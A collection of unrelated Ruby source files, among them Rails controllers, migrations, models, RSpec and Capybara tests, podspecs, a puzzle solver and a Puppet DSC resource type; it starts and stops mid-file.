'仲間意識(なかまいしき)', '母性愛(ぼせいあい)', '感心(かんしん)' ], [ '純愛(じゅんあい)', '友情(ゆうじょう)', '同情(どうじょう)', '父性愛(ふせいあい)', '幸福感(こうふくかん)', '信頼(しんらい)' ], [ '競争心(きょうそうしん)', '親近感(しんきんかん)', 'まごころ', '好意(こうい)', '有為(ゆうい)', '崇拝(すうはい)' ], [ '大嫌い(だいきらい)', '妬み(ねたみ)', '侮蔑(ぶべつ)', '腐れ縁(くされえん)', '恐怖(きょうふ)', '劣等感(れっとうかん)' ], [ '偏愛(へんあい)', '寂しさ(さびしさ)', '憐憫(れんびん)', '闘争心(とうそうしん)', '食傷(しょくしょう)', '嘘つき(うそつき)' ], [ '甘え(あまえ)', '苛立ち(いらだち)', '下心(したごころ)', '憎悪(ぞうお)', '疑惑(ぎわく)', '支配(しはい)' ], ] ) }.freeze register_prefix('\d+AG', TABLES.keys) end end end
# frozen_string_literal: true begin require "pry-byebug" rescue LoadError end ENV["RAILS_ENV"] = "test" require "rubanok" Dir["#{File.dirname(__FILE__)}/support/**/*.rb"].sort.each { |f| require f } RSpec.configure do |config| config.mock_with :rspec config.example_status_persistence_file_path = "tmp/rspec_examples.txt" config.filter_run :focus config.run_all_when_everything_filtered = true config.order = :random Kernel.srand config.seed end
#--- # Excerpted from "Rails 4 Test Prescriptions", # published by The Pragmatic Bookshelf. # Copyrights apply to this code. It may not be used to create training material, # courses, books, articles, and the like. Contact us if you are in doubt. # We make no guarantees that this code is fit for any purpose. # Visit http://www.pragmaticprogrammer.com/titles/nrtest2 for more book information. #--- class AddOrderToTasks < ActiveRecord::Migration def change add_column :tasks, :project_order, :integer end end
class DummyAuctionable < ActiveRecord::Base include AlleApi::Auctionable attr_accessible :category_id, :title, :weight def title_for_auction "#{title} for auction" end def category_id_for_auction 666 end def image_1_contents File.read(Rails.root.join 'spec/support/fixtures/1x1.jpg') end end
def get_coordinates(token) return token.split(',').map(&:to_i) end def get_instruction(line) tokens = line.split instruction = nil coordinates = [nil,nil],[nil,nil] if line =~ /^turn/ instruction = tokens[1] coordinates[0] = get_coordinates tokens[2] coordinates[1] = get_coordinates tokens[4] elsif line =~ /^toggle/ instruction = 'toggle' coordinates[0] = get_coordinates tokens[1] coordinates[1] = get_coordinates tokens[3] end return instruction,coordinates end def toggle(light) !light end def turn(on, light) on end def turn_int(value, light) [0, light + value].max end def bind_functor(f, closure) return lambda { |x| f.call(closure, x) } end def santa(type, lights, instruction, coordinates) start = coordinates[0] ends = coordinates[1] xx = [start[0], ends[0]].sort yy = [start[1], ends[1]].sort function = nil if type == 1 function = bind_functor(method(:turn), instruction == 'on') function = method(:toggle) if instruction == 'toggle' else closure = 2 closure = 1 if instruction == 'on' closure = -1 if instruction == 'off' function = bind_functor(method(:turn_int), closure) end lights[xx[0]..xx[1]].each { |row| row.map!.with_index { |x,i| ( (yy[0]..yy[1]).include?(i) ? function.call(x) : x ) } } end MAX = 1000 lights1 = Array.new(MAX) {Array.new(MAX,false)} lights2 = Array.new(MAX) {Array.new(MAX,0)} STDIN.each_line do |line| instruction,coordinates = get_instruction line santa(1, lights1, instruction, coordinates) santa(2, lights2, instruction, coordinates) end puts (lights1.map { |row| row.count true }).reduce(:+) puts (lights2.map { |row| row.reduce(:+) }).reduce(:+)
class Tasks::Mutations::Create < Lib::Mutations::WithUserAuthentication graphql_name 'createTask' description 'Create new task' argument :project_id, ID, required: true argument :name, String, required: true field :task, Lib::Objects::Task, null: true field :errors, [Lib::Objects::Error], null: false def resolve(**args) result = run ::Tasks::Create, args if result.success? { task: result[:model], errors: [] } else { errors: Lib::Service::ErrorsConverter.call(result['contract.default']) } end end end
require 'test_helper' class CruddlerIntegrationTest < ActionDispatch::IntegrationTest test "Basic CRUD" do # INDEX visit '/houses' assert page.has_content?('No Houses') # CREATE click_link 'Create' assert_equal '/houses/new', current_path fill_in 'house_name', with: "First House" fill_in 'house_number', with: '1' click_button 'Create House' # INDEX, again assert_equal '/houses', current_path assert page.has_content?('First House') assert !page.has_content?('No Houses') # SHOW click_link 'Show' assert page.has_content?('First House') click_link 'Abort' assert_equal '/houses', current_path # EDIT click_link 'Edit' #assert page.has_content?('FancyGallery') fill_in 'house_name', with: "Another House" click_button 'Update House' # INDEX, again assert_equal '/houses', current_path assert !page.has_content?('First House') assert page.has_content?('Another House') # DESTROY click_link "Destroy" assert_equal '/houses', current_path assert page.has_content?('No Houses') end test "Nested has_many CRUD" do house = House.create!(name: 'Cat House', number: 666) # INDEX visit "/houses/#{house.id}/cats" assert page.has_content?('No Cats') # CREATE click_link 'Create' assert_equal "/houses/#{house.id}/cats/new", current_path fill_in 'cat_name', with: "Sheldon" click_button 'Create Cat' # INDEX, again assert_equal "/houses/#{house.id}/cats", current_path assert page.has_content?('Cat House') assert page.has_content?('Sheldon') # SHOW click_link 'Show' assert_equal "/houses/#{house.id}/cats/#{house.cats.first.id}", current_path assert page.has_content?('Sheldon') assert page.has_content?('Cat House') click_link 'Abort' assert_equal "/houses/#{house.id}/cats", current_path # EDIT click_link 'Edit' assert_equal "/houses/#{house.id}/cats/#{house.cats.first.id}/edit", current_path fill_in 'cat_name', with: "Lennard" click_button 'Update Cat' # INDEX, again assert !page.has_content?('Sheldon') assert page.has_content?('Lennard') # DESTROY click_link "Destroy" assert_equal "/houses/#{house.id}/cats", current_path assert page.has_content?('No Cats') %w{Moritz Klara Finka Willi}.each do |nam| visit "/houses/#{house.id}/cats" # CREATE click_link 'Create' assert_equal "/houses/#{house.id}/cats/new", current_path fill_in 'cat_name', with: nam click_button 'Create Cat' # INDEX, again assert_equal "/houses/#{house.id}/cats", current_path assert page.has_content?('Cat House') assert page.has_content?(nam) end house.cats.each do |cat| visit "/houses/#{house.id}/cats/#{cat.id}/edit" fill_in 'cat_name', with: "Moo#{cat.name}" click_button 'Update Cat' assert_equal "/houses/#{house.id}/cats", current_path assert page.has_content?("Moo#{cat.name}") end end test "Nested polymorphic has_many CRUD" do house = House.create!(name: 'Dog House', number: 666) # INDEX visit "/houses/#{house.id}/dogs" assert page.has_content?('No Dogs') # CREATE click_link 'Create' assert_equal "/houses/#{house.id}/dogs/new", current_path fill_in 'dog_name', with: "Waldi" click_button 'Create Dog' # INDEX, again assert_equal "/houses/#{house.id}/dogs", current_path assert page.has_content?('Dog House') assert page.has_content?('Waldi') # SHOW click_link 'Show' assert_equal "/houses/#{house.id}/dogs/#{house.dogs.first.id}", current_path assert page.has_content?('Waldi') assert page.has_content?('Dog House') click_link 'Abort' assert_equal "/houses/#{house.id}/edit", current_path # EDIT visit "/houses/#{house.id}/dogs" click_link 'Edit' assert_equal "/houses/#{house.id}/dogs/#{house.dogs.first.id}/edit", current_path fill_in 'dog_name', with: "Fifi" click_button 'Update Dog' # INDEX, again assert !page.has_content?('Waldi') assert page.has_content?('Fifi') # DESTROY click_link "Destroy" assert_equal "/houses/#{house.id}/dogs", current_path assert page.has_content?('No Dogs') %w{Wau Bello Hasso Brain}.each do |nam| visit "/houses/#{house.id}/dogs" # CREATE click_link 'Create' assert_equal "/houses/#{house.id}/dogs/new", current_path fill_in 'dog_name', with: nam click_button 'Create Dog' # INDEX, again assert_equal "/houses/#{house.id}/dogs", current_path assert page.has_content?('Dog House') assert page.has_content?(nam) end house.dogs.each do |dog| visit "/houses/#{house.id}/dogs/#{dog.id}/edit" fill_in 'dog_name', with: "Moo#{dog.name}" click_button 'Update Dog' assert_equal "/houses/#{house.id}/dogs", current_path assert page.has_content?("Moo#{dog.name}") end # save_and_open_page end test "Double Nested has_many CRUD" do house = House.create!(name: 'Cat House', number: 666) cat = Cat.new(name: 'Mouw') cat.house = house cat.save! prefix = "/houses/#{house.id}/cats/#{cat.id}" # INDEX visit "#{prefix}/parasites" assert page.has_content?('No Parasites') # CREATE click_link 'Create' assert_equal "#{prefix}/parasites/new", current_path fill_in 'parasite_name', with: "Sucker" click_button 'Create Parasite' # INDEX, again assert_equal "#{prefix}/parasites", current_path assert page.has_content?('Cat House') assert page.has_content?('Mouw') assert page.has_content?('Sucker') # SHOW click_link 'Show' assert_equal "#{prefix}/parasites/#{cat.parasites.first.id}", current_path assert page.has_content?('Sucker') assert page.has_content?('Mouw') assert page.has_content?('Cat House') click_link 'Abort' assert_equal "#{prefix}/parasites", current_path # EDIT click_link 'Edit' assert_equal "#{prefix}/parasites/#{cat.parasites.first.id}/edit", current_path fill_in 'parasite_name', with: "Vampire" click_button 'Update Parasite' # INDEX, again assert !page.has_content?('Sucker') assert page.has_content?('Vampire') # DESTROY click_link "Destroy" assert_equal "#{prefix}/parasites", current_path assert page.has_content?('No Parasites') %w{Moritz Klara Finka Willi}.each do |nam| visit "#{prefix}/parasites" # CREATE click_link 'Create' assert_equal "#{prefix}/parasites/new", current_path fill_in 'parasite_name', with: nam click_button 'Create Parasite' # INDEX, again assert_equal "#{prefix}/parasites", current_path assert page.has_content?('Cat House') assert page.has_content?(nam) end cat.parasites.each.with_index do |parasite, i| visit "#{prefix}/parasites/#{parasite.id}/edit" fill_in 'parasite_name', with: "Moo#{parasite.name}" fill_in 'parasite_legs', with: 3*i+1 click_button 'Update Parasite' assert_equal "#{prefix}/parasites", current_path assert page.has_content?("Moo#{parasite.name}") assert page.has_content?("#{3*i+1}") end end end
class Religion < ActiveRecord::Base extend FriendlyId friendly_id :name, use: :slugged has_many :events # Validations # validates :name, presence: true, uniqueness: true def to_s name end end
module Versus class Region < Model attr_accessor :adjective, :natural_feature, :associated_historical_figure_name has_many :towns has_many :people, through: :towns belongs_to :continent def name if adjective && associated_historical_figure_name "the #{adjective.capitalize} #{natural_feature.capitalize} of #{associated_historical_figure_name}" else "the #{natural_feature.capitalize}" end end end end
class DurationsController < ApplicationController # before_action :set_duration, only: [:show, :update, :destroy] # GET /durations # GET /durations.json def index get_user if !@user render_not_found elsif !has_access? forbidden else render_duration end end def render_duration @date = params[:date] if !@date render_missing_date return end begin date = Date.parse(@date) rescue ArgumentError => error render_invalid_date return end dayStart = date.to_time.to_i dayEnd = (date + 1).to_time.to_i @durations = Duration.where('user_id = ? AND time >= ? AND time < ?', @user.id, dayStart, dayEnd) times = @durations.map {|d| d.created_at} # render json: @durations render json: { data: @durations.map {|d| { project: d.project, time: d.time, duration: d.duration }}, branches: @durations.map {|d| d.branch}, start: times.first, end: times.last} end # GET /durations/1 # GET /durations/1.json def show render json: @duration end # POST /durations # POST /durations.json def create @duration = Duration.new(duration_params) if @duration.save render json: @duration, status: :created, location: @duration else render json: @duration.errors, status: :unprocessable_entity end end # PATCH/PUT /durations/1 # PATCH/PUT /durations/1.json def update @duration = Duration.find(params[:id]) if @duration.update(duration_params) head :no_content else render json: @duration.errors, status: :unprocessable_entity end end # DELETE /durations/1 # DELETE /durations/1.json def destroy @duration.destroy head :no_content end private def set_duration @duration = Duration.find(params[:id]) end def duration_params params.require(:duration).permit(:user_id, :project, :time, :duration, :branch) end def render_missing_date render json: {error: "Missing date."} end def render_invalid_date render json: {error: "Invalid date."} end end
# # To learn more about a Podspec see http://guides.cocoapods.org/syntax/podspec.html. # Run `pod lib lint flutter_branch_sdk.podspec' to validate before publishing. # Pod::Spec.new do |s| s.name = 'flutter_branch_sdk' s.version = '1.3.2' s.summary = 'Flutter Plugin for Brach Metrics SDK - https:&#x2F;&#x2F;branch.io' s.description = <<-DESC Flutter Plugin for Brach Metrics SDK - https:&#x2F;&#x2F;branch.io DESC s.homepage = 'https://github.com/RodrigoSMarques/flutter_branch_sdk' s.license = { :file => '../LICENSE' } s.author = { 'Rodrigo S. Marques' => '[email protected]' } s.source = { :path => '.' } s.source_files = 'Classes/**/*' s.dependency 'Flutter' s.dependency 'Branch', '~> 1.39.0' s.platform = :ios, '9.0' # Flutter.framework does not contain a i386 slice. Only x86_64 simulators are supported. s.pod_target_xcconfig = { 'DEFINES_MODULE' => 'YES', 'VALID_ARCHS[sdk=iphonesimulator*]' => 'x86_64' } s.swift_version = '5.0' end
# frozen_string_literal: true ActionView::Helpers::FormBuilder.class_eval do def error_message(method, tag: :div, ref_method: nil, escape: true, **options, &block) return if object.errors.empty? error = object.errors[method]&.first error ||= object.errors[ref_method]&.first if ref_method return unless error if block_given? @template.content_tag(tag, options, nil, escape, &block) else @template.content_tag(tag, error, options, escape) end end [:text_field, :password_field, :file_field, :text_area, :color_field, :search_field, :telephone_field, :phone_field, :date_field, :time_field, :datetime_field, :datetime_local_field, :month_field, :week_field, :url_field, :email_field, :number_field, :range_field].each do |selector| alias_method :"_#{selector}", selector unless instance_methods(false).include?(:"_#{selector}") class_eval <<-RUBY_EVAL, __FILE__, __LINE__ + 1 def #{selector}(method, **options) _#{selector} method, normalize_html_options(method, **options) end RUBY_EVAL end alias_method :_check_box, :check_box unless instance_methods(false).include?(:_check_box) def check_box(method, options = {}, checked_value = '1', unchecked_value = '0') _check_box method, normalize_html_options(method, **options), checked_value, unchecked_value end alias_method :_radio_button, :radio_button unless instance_methods(false).include?(:_radio_button) def radio_button(method, tag_value, options = {}) _radio_button method, tag_value, normalize_html_options(method, **options) end alias_method :_select, :select unless instance_methods(false).include?(:_select) def select(method, choices = nil, options = {}, html_options = {}, &block) _select method, choices, options, normalize_html_options(method, **html_options), &block end alias_method :_collection_select, :collection_select unless instance_methods(false).include?(:_collection_select) def collection_select(method, collection, value_method, text_method, options = {}, html_options = {}) _collection_select method, collection, value_method, text_method, options, normalize_html_options(method, **html_options) end alias_method :_grouped_collection_select, :grouped_collection_select unless instance_methods(false).include?(:_grouped_collection_select) def grouped_collection_select(method, collection, group_method, group_label_method, option_key_method, option_value_method, options = {}, html_options = {}) _grouped_collection_select method, collection, group_method, group_label_method, option_key_method, option_value_method, options, normalize_html_options(method, **html_options) end alias_method :_time_zone_select, :time_zone_select unless instance_methods(false).include?(:_time_zone_select) def time_zone_select(method, priority_zones = nil, options = {}, html_options = {}) _time_zone_select method, priority_zones, options, normalize_html_options(method, **html_options) end # TODO: collection_check_boxes, collection_radio_buttons private def normalize_html_options(method, class_for_error: nil, ref_method: nil, **options) if @object&.errors&.any? && class_for_error.present? errors = @object.errors if errors.include?(method) || (ref_method.present? && errors.include?(ref_method.to_sym)) return options.merge class: [options[:class], class_for_error].join(' ') end end options end end
require 'yaml' require 'ostruct' module PHPBB3_BB2MD # Parse yaml config class Config attr_reader :hash def initialize(conf) path = File.expand_path(File.dirname(__FILE__)) + '/../../config/' file = path + conf + '.yml' raise 'no such config' unless File.exist?(file) @hash = to_struct(YAML.safe_load(open(file,'r:UTF-8').read)) end private def to_struct(hash) hash.each do |k, v| s = OpenStruct.new v.each do |k, v| s[k] = v end hash[k] = s end end end end
# frozen_string_literal: true require 'rails_helper' RSpec.configure do |config| config.swagger_root = Rails.root.join('swagger').to_s config.swagger_docs = { 'v1/swagger.yaml' => { openapi: '3.0.1', info: { title: 'API V1', version: 'v1' }, paths: {}, servers: [ { url: 'http://{defaultHost}', variables: { defaultHost: { default: 'localhost' } } } ] } } config.swagger_format = :yaml end
# frozen_string_literal: true require 'forwardable' require 'r2-oas/schema/v3/generator' module R2OAS module Schema class Generator extend Forwardable def_delegators :@generator, :generate_docs def initialize(options = {}) case ::R2OAS.version when :v3 @generator = V3::Generator.new(options) else raise NoImplementError, "Do not support version: #{::R2OAS.version}" end end end end end
# == Schema Information # # Table name: base_items # # id :bigint(8) not null, primary key # name :string # category :string # barcode_count :integer # created_at :datetime not null # updated_at :datetime not null # size :string # item_count :integer # partner_key :string # class BaseItem < ApplicationRecord has_many :items, dependent: :destroy, inverse_of: :base_item, foreign_key: :partner_key, primary_key: :partner_key has_many :barcode_items, as: :barcodeable, dependent: :destroy validates :name, presence: true, uniqueness: true validates :partner_key, presence: true, uniqueness: true scope :by_partner_key, ->(partner_key) { where(partner_key: partner_key) } scope :alphabetized, -> { order(:name) } def to_h { partner_key: partner_key, name: name } end end
class AnnotationCategoriesController < ApplicationController include AnnotationCategoriesHelper respond_to :js before_action { authorize! } layout 'assignment_content' responders :flash content_security_policy only: :index do |p| # required because MathJax dynamically changes # style. # TODO: remove this when possible p.style_src :self, "'unsafe-inline'" end def index @assignment = Assignment.find(params[:assignment_id]) @annotation_categories = AnnotationCategory.visible_categories(@assignment, current_role) .includes(:assignment, :annotation_texts) respond_to do |format| format.html format.json { data = @annotation_categories.map do |cat| { id: cat.id, annotation_category_name: "#{cat.annotation_category_name}"\ "#{cat.flexible_criterion_id.nil? ? '' : " [#{cat.flexible_criterion.name}]"}", texts: cat.annotation_texts.map do |text| { id: text.id, content: text.content, deduction: text.deduction } end } end render json: data } end end def new @assignment = Assignment.find(params[:assignment_id]) end def create @assignment = Assignment.find(params[:assignment_id]) @annotation_category = @assignment.annotation_categories.new(annotation_category_params) if @annotation_category.save flash_message(:success, t('.success')) respond_to do |format| format.js { render :insert_new_annotation_category } end else respond_with @annotation_category do |format| format.js { head :bad_request } end end end def show @annotation_category = record @assignment = @annotation_category.assignment @annotation_texts = annotation_text_data(record) end def destroy @annotation_category = record @assignment = @annotation_category.assignment if @annotation_category.destroy flash_message(:success, t('.success')) else flash_message(:error, t('.error')) render 'show', assignment_id: @assignment.id, id: @annotation_category.id end end def update @annotation_category = record @assignment = @annotation_category.assignment if @annotation_category.update(annotation_category_params) flash_message(:success, t('.success')) render 'show', assignment_id: @assignment.id, id: @annotation_category.id else respond_with @annotation_category, render: { body: nil, status: :bad_request } end end def new_annotation_text @assignment = Assignment.find(params[:assignment_id]) @annotation_category = @assignment.annotation_categories.find(params[:annotation_category_id]) end def create_annotation_text @annotation_text = AnnotationText.new( **annotation_text_params.to_h.symbolize_keys, creator_id: current_role.id, last_editor_id: current_role.id ) if @annotation_text.save flash_now(:success, t('annotation_categories.update.success')) @annotation_category = @annotation_text.annotation_category @assignment = @annotation_category.assignment @text = annotation_text_data(@annotation_category).find do |text| text[:id] == @annotation_text.id end render :insert_new_annotation_text else flash_message(:error, t('.error')) head :bad_request end end def destroy_annotation_text @annotation_text = record @assignment = Assignment.find_by(id: params[:assignment_id]) if @annotation_text.destroy flash_now(:success, t('.success')) else flash_message(:error, t('.deductive_annotation_released_error')) head :bad_request end end def update_annotation_text @annotation_text = record @assignment = Assignment.find_by(id: params[:assignment_id]) if @annotation_text.update(**annotation_text_params.to_h.symbolize_keys, last_editor_id: current_role.id) flash_now(:success, t('annotation_categories.update.success')) @text = annotation_text_data(@annotation_text.annotation_category, course: record.course).find do |text| text[:id] == @annotation_text.id end else flash_message(:error, t('.deductive_annotation_released_error')) head :bad_request end end def find_annotation_text string = params[:string] texts_for_current_assignment = AnnotationText.joins(:annotation_category) .where('annotation_categories.assessment_id': params[:assignment_id]) one_time_texts = AnnotationText.joins(annotations: { result: { grouping: :group } }) .where( creator_id: current_role.id, 'groupings.assessment_id': params[:assignment_id], annotation_category_id: nil ) annotation_texts = texts_for_current_assignment.where('lower(content) LIKE ?', "#{string.downcase}%").limit(10) | one_time_texts.where('lower(content) LIKE ?', "#{string.downcase}%").limit(10) render json: annotation_texts end # This method handles the drag/drop Annotations sorting. # It currently ignores annotation categories that are not associated with the passed assignment. def update_positions assignment = Assignment.find(params[:assignment_id]) position = 0 params[:annotation_category].compact.each do |id| annotation_category = assignment.annotation_categories.find_by(id: id) next if annotation_category.nil? annotation_category.update(position: position) position += 1 end head :ok end def download @assignment = Assignment.find(params[:assignment_id]) @annotation_categories = @assignment.annotation_categories case params[:format] when 'csv' ac = prepare_for_conversion(@annotation_categories) file_out = MarkusCsv.generate( ac) do |annotation_category_name, annotation_texts| # csv format is annotation_category.name, annotation_category.flexible_criterion, # annotation_text.content[, optional: annotation_text.deduction ] annotation_texts.unshift(annotation_category_name) end send_data file_out, filename: "#{@assignment.short_identifier}_annotations.csv", disposition: 'attachment' when 'yml' send_data annotation_categories_to_yml(@annotation_categories), filename: "#{@assignment.short_identifier}_annotations.yml", disposition: 'attachment' else flash[:error] = t('download_errors.unrecognized_format', format: params[:format]) redirect_to action: 'index', id: params[:id] end end def upload @assignment = Assignment.find(params[:assignment_id]) begin data = process_file_upload rescue Psych::SyntaxError => e flash_message(:error, t('upload_errors.syntax_error', error: e.to_s)) rescue StandardError => e flash_message(:error, e.message) else AnnotationCategory.transaction do if data[:type] == '.csv' result = MarkusCsv.parse(data[:file].read, encoding: data[:encoding]) do |row| next if CSV.generate_line(row).strip.empty? AnnotationCategory.add_by_row(row, @assignment, current_role) end if result[:invalid_lines].empty? flash_message(:success, result[:valid_lines]) unless result[:valid_lines].empty? else flash_message(:error, result[:invalid_lines]) raise ActiveRecord::Rollback end elsif data[:type] == '.yml' begin successes = upload_annotations_from_yaml(data[:contents], @assignment) if successes > 0 flash_message(:success, t('annotation_categories.upload.success', annotation_category_number: successes)) end rescue CsvInvalidLineError => e flash_message(:error, e.message) raise ActiveRecord::Rollback end end end end redirect_to course_assignment_annotation_categories_path(current_course, @assignment) end def annotation_text_data(category, course: nil) shared_values = ['annotation_texts.id AS id', 'end_users_roles.user_name AS last_editor', 'users.user_name AS creator', 'annotation_texts.content AS content'] course ||= category&.course base_query = AnnotationText.joins(creator: :end_user) .left_outer_joins(last_editor: :end_user) .where('annotation_texts.annotation_category_id': category) .where('roles.course_id': course) .order('users.user_name') if category.nil? text_data = base_query.joins(annotations: { result: { grouping: :group } }) .where('groupings.assessment_id': params[:assignment_id]) .order('results.id') .pluck_to_hash('groups.group_name AS group_name', 'groupings.assessment_id AS assignment_id', 'results.id AS result_id', 'results.submission_id AS submission_id', *shared_values) else text_data = base_query.left_outer_joins(annotation_category: :flexible_criterion) .pluck_to_hash('annotation_categories.assessment_id AS assignment_id', 'annotation_texts.deduction AS deduction', 'annotation_texts.annotation_category_id AS annotation_category', 'criteria.max_mark AS max_mark', *shared_values) text_usage = AnnotationText.left_outer_joins(annotations: :result) .where('annotation_texts.annotation_category_id': category) .group('annotation_texts.id') .count('annotations.id') text_released = AnnotationText.left_outer_joins(annotations: :result) .where('annotation_texts.annotation_category_id': category) .group('annotation_texts.id') .count('results.released_to_students OR NULL') text_data.each do |text| text['num_uses'] = text_usage[text[:id]] text['released'] = text_released[text[:id]] end end text_data end def annotation_text_uses render json: record.uses end def uncategorized_annotations @assignment = Assignment.find(params[:assignment_id]) @texts = annotation_text_data(nil, course: @assignment.course) respond_to do |format| format.js {} format.json { render json: @texts } format.csv do data = MarkusCsv.generate( @texts ) do |text| row = [text[:group_name], text[:last_editor], text[:creator], text[:content]] row end filename = "#{@assignment.short_identifier}_one_time_annotations.csv" send_data data, disposition: 'attachment', type: 'text/csv', filename: filename end end end private def annotation_category_params params.require(:annotation_category) .permit(:annotation_category_name, :flexible_criterion_id) end def annotation_text_params params.permit(:id, :content, :deduction, :annotation_category_id) end # This override is necessary because this controller is acting as a controller # for both annotation categories and annotation texts. # # TODO: move all annotation text routes into their own controller and remove this def record @record ||= if params[:annotation_category_id] AnnotationText.find_by(id: params[:id]) elsif params[:annotation_text_id] AnnotationText.find_by(id: params[:annotation_text_id]) else AnnotationCategory.find_by(id: params[:id]) end end def flash_interpolation_options { errors: @annotation_category.errors.full_messages.join('; ') } end end
Pod::Spec.new do |s| s.name = "SwiftPing" s.summary = "SwiftPing:ICMP Ping in swift - Forked from https://github.com/ankitthakur/SwiftPing" s.version = "1.1.3" s.homepage = "https://github.com/toandk/SwiftPing" s.license = 'MIT' s.author = { "Ankit Thakur" => "[email protected]" } s.source = { :git => "https://github.com/toandk/SwiftPing.git", :tag => s.version.to_s } s.social_media_url = 'https://twitter.com/ankitthakur' s.ios.deployment_target = '9.0' s.osx.deployment_target = '10.9' s.tvos.deployment_target = '9.2' s.requires_arc = true s.ios.source_files = 'Sources/{iOS,Shared}/**/*' s.tvos.source_files = 'Sources/{iOS,Shared}/**/*' s.osx.source_files = 'Sources/{Mac,Shared}/**/*' # s.ios.frameworks = 'UIKit', 'Foundation' # s.osx.frameworks = 'Cocoa', 'Foundation' # s.dependency 'Whisper', '~> 1.0' end
# Copyright 2015 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. require 'google/apis/cloudiot_v1/service.rb' require 'google/apis/cloudiot_v1/classes.rb' require 'google/apis/cloudiot_v1/representations.rb' module Google module Apis # Cloud IoT API # # Registers and manages IoT (Internet of Things) devices that connect to the # Google Cloud Platform. # # @see https://cloud.google.com/iot module CloudiotV1 VERSION = 'V1' REVISION = '20200414' # View and manage your data across Google Cloud Platform services AUTH_CLOUD_PLATFORM = 'https://www.googleapis.com/auth/cloud-platform' # Register and manage devices in the Google Cloud IoT service AUTH_CLOUDIOT = 'https://www.googleapis.com/auth/cloudiot' end end end
require 'admin_materialize/version' module AdminMaterialize module Rails class Engine < ::Rails::Engine end end end
# == Schema Information # # Table name: ingress_communities # # id :integer not null, primary key # name :string # created_at :datetime not null # updated_at :datetime not null # require 'rails_helper' RSpec.describe Ingress::Community, type: :model do pending "add some examples to (or delete) #{__FILE__}" end
require 'spec_helper' describe 'Users > User browses projects on user page', :js do let!(:user) { create :user } let!(:private_project) do create :project, :private, name: 'private', namespace: user.namespace do |project| project.add_maintainer(user) end end let!(:internal_project) do create :project, :internal, name: 'internal', namespace: user.namespace do |project| project.add_maintainer(user) end end let!(:public_project) do create :project, :public, name: 'public', namespace: user.namespace do |project| project.add_maintainer(user) end end def click_nav_link(name) page.within '.nav-links' do click_link name end end it 'hides loading spinner after load', :js do visit user_path(user) click_nav_link('Personal projects') wait_for_requests expect(page).not_to have_selector('.loading-status .loading', visible: true) end it 'paginates projects', :js do project = create(:project, namespace: user.namespace, updated_at: 2.minutes.since) project2 = create(:project, namespace: user.namespace, updated_at: 1.minute.since) allow(Project).to receive(:default_per_page).and_return(1) sign_in(user) visit user_path(user) click_nav_link('Personal projects') wait_for_requests expect(page).to have_content(project.name) click_link('Next') expect(page).to have_content(project2.name) end context 'when not signed in' do it 'renders user public project' do visit user_path(user) click_nav_link('Personal projects') expect(page).to have_css('.tab-content #projects.active') expect(title).to start_with(user.name) expect(page).to have_content(public_project.name) expect(page).not_to have_content(private_project.name) expect(page).not_to have_content(internal_project.name) end end context 'when signed in as another user' do let(:another_user) { create :user } before do sign_in(another_user) end it 'renders user public and internal projects' do visit user_path(user) click_nav_link('Personal projects') expect(title).to start_with(user.name) expect(page).not_to have_content(private_project.name) expect(page).to have_content(public_project.name) expect(page).to have_content(internal_project.name) end end context 'when signed in as user' do before do sign_in(user) end describe 'personal projects' do it 'renders all user projects' do visit user_path(user) click_nav_link('Personal projects') expect(title).to start_with(user.name) expect(page).to have_content(private_project.name) expect(page).to have_content(public_project.name) expect(page).to have_content(internal_project.name) end end describe 'contributed projects' do context 'when user has contributions' do let(:contributed_project) do create :project, :public, :empty_repo end before do Issues::CreateService.new(contributed_project, user, { title: 'Bug in old browser' }).execute event = create(:push_event, project: contributed_project, author: user) create(:push_event_payload, event: event, commit_count: 3) end it 'renders contributed project' do visit user_path(user) expect(title).to start_with(user.name) expect(page).to have_css('.js-contrib-calendar') click_nav_link('Contributed projects') page.within '#contributed' do expect(page).to have_content(contributed_project.name) end end end end end end
module KegbotApi VERSION = "0.0.1" end
class Verdict::Group include Verdict::Metadata attr_reader :experiment, :handle def initialize(experiment, handle) @experiment, @handle = experiment, handle.to_s end def to_s handle end def to_sym handle.to_sym end def ===(other) case other when Verdict::Group; experiment == other.experiment && other.handle == handle when Symbol, String; handle == other.to_s else false end end def as_json(options = {}) { handle: handle, metadata: metadata } end def to_json(options = {}) as_json(options).to_json end end
require 'pathname' Puppet::Type.newtype(:dsc_xsqlserversetup) do require Pathname.new(__FILE__).dirname + '../../' + 'puppet/type/base_dsc' require Pathname.new(__FILE__).dirname + '../../puppet_x/puppetlabs/dsc_type_helpers' @doc = %q{ The DSC xSQLServerSetup resource type. Automatically generated from 'xSQLServer/DSCResources/MSFT_xSQLServerSetup/MSFT_xSQLServerSetup.schema.mof' To learn more about PowerShell Desired State Configuration, please visit https://technet.microsoft.com/en-us/library/dn249912.aspx. For more information about built-in DSC Resources, please visit https://technet.microsoft.com/en-us/library/dn249921.aspx. For more information about xDsc Resources, please visit https://github.com/PowerShell/DscResources. } validate do fail('dsc_instancename is a required attribute') if self[:dsc_instancename].nil? end def dscmeta_resource_friendly_name; 'xSQLServerSetup' end def dscmeta_resource_name; 'MSFT_xSQLServerSetup' end def dscmeta_module_name; 'xSQLServer' end def dscmeta_module_version; '' end newparam(:name, :namevar => true ) do end ensurable do newvalue(:exists?) { provider.exists? } newvalue(:present) { provider.create } defaultto { :present } end # Name: SourcePath # Type: string # IsMandatory: False # Values: None newparam(:dsc_sourcepath) do def mof_type; 'string' end def mof_is_embedded?; false end desc "SourcePath - UNC path to the root of the source files for installation." validate do |value| unless value.kind_of?(String) fail("Invalid value '#{value}'. Should be a string") end end end # Name: SourceFolder # Type: string # IsMandatory: False # Values: None newparam(:dsc_sourcefolder) do def mof_type; 'string' end def mof_is_embedded?; false end desc "SourceFolder - Folder within the source path containing the source files for installation." validate do |value| unless value.kind_of?(String) fail("Invalid value '#{value}'. Should be a string") end end end # Name: SetupCredential # Type: MSFT_Credential # IsMandatory: False # Values: None newparam(:dsc_setupcredential) do def mof_type; 'MSFT_Credential' end def mof_is_embedded?; true end desc "SetupCredential - Credential to be used to perform the installation." validate do |value| unless value.kind_of?(Hash) fail("Invalid value '#{value}'. Should be a hash") end PuppetX::Dsc::TypeHelpers.validate_MSFT_Credential("SetupCredential", value) end end # Name: SourceCredential # Type: MSFT_Credential # IsMandatory: 